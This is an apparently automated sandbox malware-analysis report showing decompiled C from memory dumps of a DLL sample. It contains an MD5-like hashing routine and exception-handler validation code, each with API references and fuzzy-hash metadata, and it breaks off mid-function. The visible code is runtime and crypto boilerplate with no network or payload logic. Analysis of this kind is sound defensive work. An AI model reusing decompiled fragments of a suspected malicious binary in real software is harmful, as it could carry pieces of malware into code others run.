                    				asm("rol edx, 0xe");
                    				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                    				asm("ror esi, 0xc");
                    				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                    				asm("rol eax, 0x5");
                    				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                    				asm("rol ecx, 0x9");
                    				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                    				asm("rol edx, 0xe");
                    				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                    				asm("ror esi, 0xc");
                    				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                    				asm("rol eax, 0x4");
                    				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                    				asm("rol ecx, 0xb");
                    				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                    				asm("rol edx, 0x10");
                    				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                    				_t598 = _t366 ^ _t425;
                    				asm("ror esi, 0x9");
                    				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                    				asm("rol eax, 0x4");
                    				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                    				asm("rol edi, 0xb");
                    				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                    				asm("rol edx, 0x10");
                    				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                    				_t337 = _t606 ^ _t427;
                    				asm("ror ecx, 0x9");
                    				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                    				asm("rol eax, 0x4");
                    				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                    				asm("rol esi, 0xb");
                    				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                    				asm("rol edi, 0x10");
                    				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                    				_t429 = _t733 ^ _t612;
                    				asm("ror ecx, 0x9");
                    				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                    				asm("rol eax, 0x4");
                    				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                    				asm("rol edx, 0xb");
                    				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                    				asm("rol esi, 0x10");
                    				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                    				asm("ror ecx, 0x9");
                    				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                    				asm("rol eax, 0x6");
                    				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                    				asm("rol edx, 0xa");
                    				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                    				asm("rol esi, 0xf");
                    				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                    				asm("ror ecx, 0xb");
                    				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                    				asm("rol eax, 0x6");
                    				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                    				asm("rol edx, 0xa");
                    				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                    				asm("rol esi, 0xf");
                    				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                    				asm("ror ecx, 0xb");
                    				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                    				asm("rol eax, 0x6");
                    				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                    				asm("rol edx, 0xa");
                    				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                    				asm("rol esi, 0xf");
                    				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                    				asm("ror edi, 0xb");
                    				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                    				asm("rol eax, 0x6");
                    				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                    				asm("rol edx, 0xa");
                    				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                    				_t399 = _a4;
                    				asm("rol esi, 0xf");
                    				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                    				 *_t399 =  *_t399 + _t259;
                    				asm("ror eax, 0xb");
                    				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                    				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                    				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                    				return memset( &_v76, 0, 0x40);
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memset
                    • String ID:
                    • API String ID: 2221118986-0
                    • Opcode ID: 02f01188f833f941e0481689e8a11b22f52e1a58a4b4f1c0ee04314728193f86
                    • Instruction ID: 6d3f611f9f5517425cfbefa895abe0740a50c376596bbbcdb829b26dad3dc5a5
                    • Opcode Fuzzy Hash: 02f01188f833f941e0481689e8a11b22f52e1a58a4b4f1c0ee04314728193f86
                    • Instruction Fuzzy Hash: 9922857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E10002465(long _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				short* _v32;
                    				void _v36;
                    				void* _t57;
                    				signed int _t58;
                    				signed int _t61;
                    				signed int _t62;
                    				void* _t63;
                    				signed int* _t68;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr _t72;
                    				intOrPtr _t75;
                    				void* _t76;
                    				signed int _t77;
                    				void* _t78;
                    				void _t80;
                    				signed int _t81;
                    				signed int _t84;
                    				signed int _t86;
                    				short* _t87;
                    				void* _t89;
                    				signed int* _t90;
                    				long _t91;
                    				signed int _t93;
                    				signed int _t94;
                    				signed int _t100;
                    				signed int _t102;
                    				void* _t104;
                    				long _t108;
                    				signed int _t110;
                    
                    				_t108 = _a4;
                    				_t76 =  *(_t108 + 8);
                    				if((_t76 & 0x00000003) != 0) {
                    					L3:
                    					return 0;
                    				}
                    				_a4 =  *[fs:0x4];
                    				_v8 =  *[fs:0x8];
                    				if(_t76 < _v8 || _t76 >= _a4) {
                    					_t102 =  *(_t108 + 0xc);
                    					__eflags = _t102 - 0xffffffff;
                    					if(_t102 != 0xffffffff) {
                    						_t91 = 0;
                    						__eflags = 0;
                    						_a4 = 0;
                    						_t57 = _t76;
                    						do {
                    							_t80 =  *_t57;
                    							__eflags = _t80 - 0xffffffff;
                    							if(_t80 == 0xffffffff) {
                    								goto L9;
                    							}
                    							__eflags = _t80 - _t91;
                    							if(_t80 >= _t91) {
                    								L20:
                    								_t63 = 0;
                    								L60:
                    								return _t63;
                    							}
                    							L9:
                    							__eflags =  *(_t57 + 4);
                    							if( *(_t57 + 4) != 0) {
                    								_t12 =  &_a4;
                    								 *_t12 = _a4 + 1;
                    								__eflags =  *_t12;
                    							}
                    							_t91 = _t91 + 1;
                    							_t57 = _t57 + 0xc;
                    							__eflags = _t91 - _t102;
                    						} while (_t91 <= _t102);
                    						__eflags = _a4;
                    						if(_a4 == 0) {
                    							L15:
                    							_t81 =  *0x100041f8;
                    							_t110 = _t76 & 0xfffff000;
                    							_t58 = 0;
                    							__eflags = _t81;
                    							if(_t81 <= 0) {
                    								L18:
                    								_t104 = _t102 | 0xffffffff;
                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                    								__eflags = _t61;
                    								if(_t61 < 0) {
                    									_t62 = 0;
                    									__eflags = 0;
                    								} else {
                    									_t62 = _a4;
                    								}
                    								__eflags = _t62;
                    								if(_t62 == 0) {
                    									L59:
                    									_t63 = _t104;
                    									goto L60;
                    								} else {
                    									__eflags = _v12 - 0x1000000;
                    									if(_v12 != 0x1000000) {
                    										goto L59;
                    									}
                    									__eflags = _v16 & 0x000000cc;
                    									if((_v16 & 0x000000cc) == 0) {
                    										L46:
                    										_t63 = 1;
                    										 *0x10004240 = 1;
                    										__eflags =  *0x10004240;
                    										if( *0x10004240 != 0) {
                    											goto L60;
                    										}
                    										_t84 =  *0x100041f8;
                    										__eflags = _t84;
                    										_t93 = _t84;
                    										if(_t84 <= 0) {
                    											L51:
                    											__eflags = _t93;
                    											if(_t93 != 0) {
                    												L58:
                    												 *0x10004240 = 0;
                    												goto L5;
                    											}
                    											_t77 = 0xf;
                    											__eflags = _t84 - _t77;
                    											if(_t84 <= _t77) {
                    												_t77 = _t84;
                    											}
                    											_t94 = 0;
                    											__eflags = _t77;
                    											if(_t77 < 0) {
                    												L56:
                    												__eflags = _t84 - 0x10;
                    												if(_t84 < 0x10) {
                    													_t86 = _t84 + 1;
                    													__eflags = _t86;
                    													 *0x100041f8 = _t86;
                    												}
                    												goto L58;
                    											} else {
                    												do {
                    													_t68 = 0x10004200 + _t94 * 4;
                    													_t94 = _t94 + 1;
                    													__eflags = _t94 - _t77;
                    													 *_t68 = _t110;
                    													_t110 =  *_t68;
                    												} while (_t94 <= _t77);
                    												goto L56;
                    											}
                    										}
                    										_t69 = 0x100041fc + _t84 * 4;
                    										while(1) {
                    											__eflags =  *_t69 - _t110;
                    											if( *_t69 == _t110) {
                    												goto L51;
                    											}
                    											_t93 = _t93 - 1;
                    											_t69 = _t69 - 4;
                    											__eflags = _t93;
                    											if(_t93 > 0) {
                    												continue;
                    											}
                    											goto L51;
                    										}
                    										goto L51;
                    									}
                    									_t87 = _v32;
                    									__eflags =  *_t87 - 0x5a4d;
                    									if( *_t87 != 0x5a4d) {
                    										goto L59;
                    									}
                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                    									__eflags =  *_t71 - 0x4550;
                    									if( *_t71 != 0x4550) {
                    										goto L59;
                    									}
                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                    										goto L59;
                    									}
                    									_t78 = _t76 - _t87;
                    									__eflags =  *((short*)(_t71 + 6));
                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                    									if( *((short*)(_t71 + 6)) <= 0) {
                    										goto L59;
                    									}
                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                    									__eflags = _t78 - _t72;
                    									if(_t78 < _t72) {
                    										goto L46;
                    									}
                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                    										goto L46;
                    									}
                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                    										goto L20;
                    									}
                    									goto L46;
                    								}
                    							} else {
                    								goto L16;
                    							}
                    							while(1) {
                    								L16:
                    								__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
                    								if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
                    									break;
                    								}
                    								_t58 = _t58 + 1;
                    								__eflags = _t58 - _t81;
                    								if(_t58 < _t81) {
                    									continue;
                    								}
                    								goto L18;
                    							}
                    							__eflags = _t58;
                    							if(_t58 <= 0) {
                    								goto L5;
                    							}
                    							 *0x10004240 = 1;
                    							__eflags =  *0x10004240;
                    							if( *0x10004240 != 0) {
                    								goto L5;
                    							}
                    							__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
                    							if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
                    								L32:
                    								_t100 = 0;
                    								__eflags = _t58;
                    								if(_t58 < 0) {
                    									L34:
                    									 *0x10004240 = 0;
                    									goto L5;
                    								} else {
                    									goto L33;
                    								}
                    								do {
                    									L33:
                    									_t90 = 0x10004200 + _t100 * 4;
                    									_t100 = _t100 + 1;
                    									__eflags = _t100 - _t58;
                    									 *_t90 = _t110;
                    									_t110 =  *_t90;
                    								} while (_t100 <= _t58);
                    								goto L34;
                    							}
                    							_t58 = _t81 - 1;
                    							__eflags = _t58;
                    							if(_t58 < 0) {
                    								L28:
                    								__eflags = _t81 - 0x10;
                    								if(_t81 < 0x10) {
                    									_t81 = _t81 + 1;
                    									__eflags = _t81;
                    									 *0x100041f8 = _t81;
                    								}
                    								_t58 = _t81 - 1;
                    								goto L32;
                    							} else {
                    								goto L25;
                    							}
                    							while(1) {
                    								L25:
                    								__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
                    								if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
                    									break;
                    								}
                    								_t58 = _t58 - 1;
                    								__eflags = _t58;
                    								if(_t58 >= 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							__eflags = _t58;
                    							if(__eflags >= 0) {
                    								if(__eflags == 0) {
                    									goto L34;
                    								}
                    								goto L32;
                    							}
                    							goto L28;
                    						}
                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                    						__eflags = _t75 - _v8;
                    						if(_t75 < _v8) {
                    							goto L20;
                    						}
                    						__eflags = _t75 - _t108;
                    						if(_t75 >= _t108) {
                    							goto L20;
                    						}
                    						goto L15;
                    					}
                    					L5:
                    					_t63 = 1;
                    					goto L60;
                    				} else {
                    					goto L3;
                    				}
                    			}

                    APIs
                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002516
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: MemoryQueryVirtual
                    • String ID:
                    • API String ID: 2850889275-0
                    • Opcode ID: e82cc25a9865243328718712b27d63dbee3012df9f57b2ff4402805c788c56e2
                    • Instruction ID: 14679f403e1a73c796a36ca75824cbc8d84e36d656f85ef4f4c7f83bccd55f0c
                    • Opcode Fuzzy Hash: e82cc25a9865243328718712b27d63dbee3012df9f57b2ff4402805c788c56e2
                    • Instruction Fuzzy Hash: 1D61FD30B00A528FFB19CF28DCE065933E5EB853D5B268568D856C729DEB32DC86C644
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C8401(long _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				short* _v32;
                    				void _v36;
                    				void* _t57;
                    				signed int _t58;
                    				signed int _t61;
                    				signed int _t62;
                    				void* _t63;
                    				signed int* _t68;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr _t72;
                    				intOrPtr _t75;
                    				void* _t76;
                    				signed int _t77;
                    				void* _t78;
                    				void _t80;
                    				signed int _t81;
                    				signed int _t84;
                    				signed int _t86;
                    				short* _t87;
                    				void* _t89;
                    				signed int* _t90;
                    				long _t91;
                    				signed int _t93;
                    				signed int _t94;
                    				signed int _t100;
                    				signed int _t102;
                    				void* _t104;
                    				long _t108;
                    				signed int _t110;
                    
                    				_t108 = _a4;
                    				_t76 =  *(_t108 + 8);
                    				if((_t76 & 0x00000003) != 0) {
                    					L3:
                    					return 0;
                    				}
                    				_a4 =  *[fs:0x4];
                    				_v8 =  *[fs:0x8];
                    				if(_t76 < _v8 || _t76 >= _a4) {
                    					_t102 =  *(_t108 + 0xc);
                    					__eflags = _t102 - 0xffffffff;
                    					if(_t102 != 0xffffffff) {
                    						_t91 = 0;
                    						__eflags = 0;
                    						_a4 = 0;
                    						_t57 = _t76;
                    						do {
                    							_t80 =  *_t57;
                    							__eflags = _t80 - 0xffffffff;
                    							if(_t80 == 0xffffffff) {
                    								goto L9;
                    							}
                    							__eflags = _t80 - _t91;
                    							if(_t80 >= _t91) {
                    								L20:
                    								_t63 = 0;
                    								L60:
                    								return _t63;
                    							}
                    							L9:
                    							__eflags =  *(_t57 + 4);
                    							if( *(_t57 + 4) != 0) {
                    								_t12 =  &_a4;
                    								 *_t12 = _a4 + 1;
                    								__eflags =  *_t12;
                    							}
                    							_t91 = _t91 + 1;
                    							_t57 = _t57 + 0xc;
                    							__eflags = _t91 - _t102;
                    						} while (_t91 <= _t102);
                    						__eflags = _a4;
                    						if(_a4 == 0) {
                    							L15:
                    							_t81 =  *0x10ca380; // 0x0
                    							_t110 = _t76 & 0xfffff000;
                    							_t58 = 0;
                    							__eflags = _t81;
                    							if(_t81 <= 0) {
                    								L18:
                    								_t104 = _t102 | 0xffffffff;
                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                    								__eflags = _t61;
                    								if(_t61 < 0) {
                    									_t62 = 0;
                    									__eflags = 0;
                    								} else {
                    									_t62 = _a4;
                    								}
                    								__eflags = _t62;
                    								if(_t62 == 0) {
                    									L59:
                    									_t63 = _t104;
                    									goto L60;
                    								} else {
                    									__eflags = _v12 - 0x1000000;
                    									if(_v12 != 0x1000000) {
                    										goto L59;
                    									}
                    									__eflags = _v16 & 0x000000cc;
                    									if((_v16 & 0x000000cc) == 0) {
                    										L46:
                    										_t63 = 1;
                    										 *0x10ca3c8 = 1;
                    										__eflags =  *0x10ca3c8;
                    										if( *0x10ca3c8 != 0) {
                    											goto L60;
                    										}
                    										_t84 =  *0x10ca380; // 0x0
                    										__eflags = _t84;
                    										_t93 = _t84;
                    										if(_t84 <= 0) {
                    											L51:
                    											__eflags = _t93;
                    											if(_t93 != 0) {
                    												L58:
                    												 *0x10ca3c8 = 0;
                    												goto L5;
                    											}
                    											_t77 = 0xf;
                    											__eflags = _t84 - _t77;
                    											if(_t84 <= _t77) {
                    												_t77 = _t84;
                    											}
                    											_t94 = 0;
                    											__eflags = _t77;
                    											if(_t77 < 0) {
                    												L56:
                    												__eflags = _t84 - 0x10;
                    												if(_t84 < 0x10) {
                    													_t86 = _t84 + 1;
                    													__eflags = _t86;
                    													 *0x10ca380 = _t86;
                    												}
                    												goto L58;
                    											} else {
                    												do {
                    													_t68 = 0x10ca388 + _t94 * 4;
                    													_t94 = _t94 + 1;
                    													__eflags = _t94 - _t77;
                    													 *_t68 = _t110;
                    													_t110 =  *_t68;
                    												} while (_t94 <= _t77);
                    												goto L56;
                    											}
                    										}
                    										_t69 = 0x10ca384 + _t84 * 4;
                    										while(1) {
                    											__eflags =  *_t69 - _t110;
                    											if( *_t69 == _t110) {
                    												goto L51;
                    											}
                    											_t93 = _t93 - 1;
                    											_t69 = _t69 - 4;
                    											__eflags = _t93;
                    											if(_t93 > 0) {
                    												continue;
                    											}
                    											goto L51;
                    										}
                    										goto L51;
                    									}
                    									_t87 = _v32;
                    									__eflags =  *_t87 - 0x5a4d;
                    									if( *_t87 != 0x5a4d) {
                    										goto L59;
                    									}
                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                    									__eflags =  *_t71 - 0x4550;
                    									if( *_t71 != 0x4550) {
                    										goto L59;
                    									}
                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                    										goto L59;
                    									}
                    									_t78 = _t76 - _t87;
                    									__eflags =  *((short*)(_t71 + 6));
                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                    									if( *((short*)(_t71 + 6)) <= 0) {
                    										goto L59;
                    									}
                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                    									__eflags = _t78 - _t72;
                    									if(_t78 < _t72) {
                    										goto L46;
                    									}
                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                    										goto L46;
                    									}
                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                    										goto L20;
                    									}
                    									goto L46;
                    								}
                    							} else {
                    								goto L16;
                    							}
                    							while(1) {
                    								L16:
                    								__eflags =  *((intOrPtr*)(0x10ca388 + _t58 * 4)) - _t110;
                    								if( *((intOrPtr*)(0x10ca388 + _t58 * 4)) == _t110) {
                    									break;
                    								}
                    								_t58 = _t58 + 1;
                    								__eflags = _t58 - _t81;
                    								if(_t58 < _t81) {
                    									continue;
                    								}
                    								goto L18;
                    							}
                    							__eflags = _t58;
                    							if(_t58 <= 0) {
                    								goto L5;
                    							}
                    							 *0x10ca3c8 = 1;
                    							__eflags =  *0x10ca3c8;
                    							if( *0x10ca3c8 != 0) {
                    								goto L5;
                    							}
                    							__eflags =  *((intOrPtr*)(0x10ca388 + _t58 * 4)) - _t110;
                    							if( *((intOrPtr*)(0x10ca388 + _t58 * 4)) == _t110) {
                    								L32:
                    								_t100 = 0;
                    								__eflags = _t58;
                    								if(_t58 < 0) {
                    									L34:
                    									 *0x10ca3c8 = 0;
                    									goto L5;
                    								} else {
                    									goto L33;
                    								}
                    								do {
                    									L33:
                    									_t90 = 0x10ca388 + _t100 * 4;
                    									_t100 = _t100 + 1;
                    									__eflags = _t100 - _t58;
                    									 *_t90 = _t110;
                    									_t110 =  *_t90;
                    								} while (_t100 <= _t58);
                    								goto L34;
                    							}
                    							_t25 = _t81 - 1; // -1
                    							_t58 = _t25;
                    							__eflags = _t58;
                    							if(_t58 < 0) {
                    								L28:
                    								__eflags = _t81 - 0x10;
                    								if(_t81 < 0x10) {
                    									_t81 = _t81 + 1;
                    									__eflags = _t81;
                    									 *0x10ca380 = _t81;
                    								}
                    								_t28 = _t81 - 1; // 0x0
                    								_t58 = _t28;
                    								goto L32;
                    							} else {
                    								goto L25;
                    							}
                    							while(1) {
                    								L25:
                    								__eflags =  *((intOrPtr*)(0x10ca388 + _t58 * 4)) - _t110;
                    								if( *((intOrPtr*)(0x10ca388 + _t58 * 4)) == _t110) {
                    									break;
                    								}
                    								_t58 = _t58 - 1;
                    								__eflags = _t58;
                    								if(_t58 >= 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							__eflags = _t58;
                    							if(__eflags >= 0) {
                    								if(__eflags == 0) {
                    									goto L34;
                    								}
                    								goto L32;
                    							}
                    							goto L28;
                    						}
                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                    						__eflags = _t75 - _v8;
                    						if(_t75 < _v8) {
                    							goto L20;
                    						}
                    						__eflags = _t75 - _t108;
                    						if(_t75 >= _t108) {
                    							goto L20;
                    						}
                    						goto L15;
                    					}
                    					L5:
                    					_t63 = 1;
                    					goto L60;
                    				} else {
                    					goto L3;
                    				}
                    			}





































                    APIs
                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 010C84B2
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: MemoryQueryVirtual
                    • String ID:
                    • API String ID: 2850889275-0
                    • Opcode ID: 6cf311b107776e8250562978ac5b7c47baf70df88346434c16f394fc5c2d1e29
                    • Instruction ID: f82dff0cb8e0718035d84c9ed46756083a7e98023f396d2bf846468626239926
                    • Opcode Fuzzy Hash: 6cf311b107776e8250562978ac5b7c47baf70df88346434c16f394fc5c2d1e29
                    • Instruction Fuzzy Hash: 6B61D4307002168FDB6ACF2CC49466D77E1BB85B54B28C5AFE9C5C7189EB75D8428F48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E10002244(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                    				intOrPtr _v8;
                    				char _v12;
                    				void* __ebp;
                    				signed int* _t43;
                    				char _t44;
                    				void* _t46;
                    				void* _t49;
                    				intOrPtr* _t53;
                    				void* _t54;
                    				void* _t65;
                    				long _t66;
                    				signed int* _t80;
                    				signed int* _t82;
                    				void* _t84;
                    				signed int _t86;
                    				void* _t89;
                    				void* _t95;
                    				void* _t96;
                    				void* _t99;
                    				void* _t106;
                    
                    				_t43 = _t84;
                    				_t65 = __ebx + 2;
                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                    				_t89 = _t95;
                    				_t96 = _t95 - 8;
                    				_push(_t65);
                    				_push(_t84);
                    				_push(_t89);
                    				asm("cld");
                    				_t66 = _a8;
                    				_t44 = _a4;
                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                    					_push(_t89);
                    					E100023AB(_t66 + 0x10, _t66, 0xffffffff);
                    					_t46 = 1;
                    				} else {
                    					_v12 = _t44;
                    					_v8 = _a12;
                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                    					_t86 =  *(_t66 + 0xc);
                    					_t80 =  *(_t66 + 8);
                    					_t49 = E10002465(_t66);
                    					_t99 = _t96 + 4;
                    					if(_t49 == 0) {
                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                    						goto L11;
                    					} else {
                    						while(_t86 != 0xffffffff) {
                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                    							if(_t53 == 0) {
                    								L8:
                    								_t80 =  *(_t66 + 8);
                    								_t86 = _t80[_t86 + _t86 * 2];
                    								continue;
                    							} else {
                    								_t54 =  *_t53();
                    								_t89 = _t89;
                    								_t86 = _t86;
                    								_t66 = _a8;
                    								_t55 = _t54;
                    								_t106 = _t54;
                    								if(_t106 == 0) {
                    									goto L8;
                    								} else {
                    									if(_t106 < 0) {
                    										_t46 = 0;
                    									} else {
                    										_t82 =  *(_t66 + 8);
                    										E10002350(_t55, _t66);
                    										_t89 = _t66 + 0x10;
                    										E100023AB(_t89, _t66, 0);
                    										_t99 = _t99 + 0xc;
                    										E10002447(_t82[2]);
                    										 *(_t66 + 0xc) =  *_t82;
                    										_t66 = 0;
                    										_t86 = 0;
                    										 *(_t82[2])(1);
                    										goto L8;
                    									}
                    								}
                    							}
                    							goto L13;
                    						}
                    						L11:
                    						_t46 = 1;
                    					}
                    				}
                    				L13:
                    				return _t46;
                    			}
























                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                    • Instruction ID: 00f8ef7e0395215ac697ef11dc5dc8d25bdf0f72b23bf6dca9eab4600a2e2c49
                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                    • Instruction Fuzzy Hash: 7B21C836900204AFD714DF68C8C09ABF7A5FF48390B468568ED569B249DB30FA15C7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E010C81DC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                    				intOrPtr _v8;
                    				char _v12;
                    				void* __ebp;
                    				signed int* _t43;
                    				char _t44;
                    				void* _t46;
                    				void* _t49;
                    				intOrPtr* _t53;
                    				void* _t54;
                    				void* _t65;
                    				long _t66;
                    				signed int* _t80;
                    				signed int* _t82;
                    				void* _t84;
                    				signed int _t86;
                    				void* _t89;
                    				void* _t95;
                    				void* _t96;
                    				void* _t99;
                    				void* _t106;
                    
                    				_t43 = _t84;
                    				_t65 = __ebx + 2;
                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
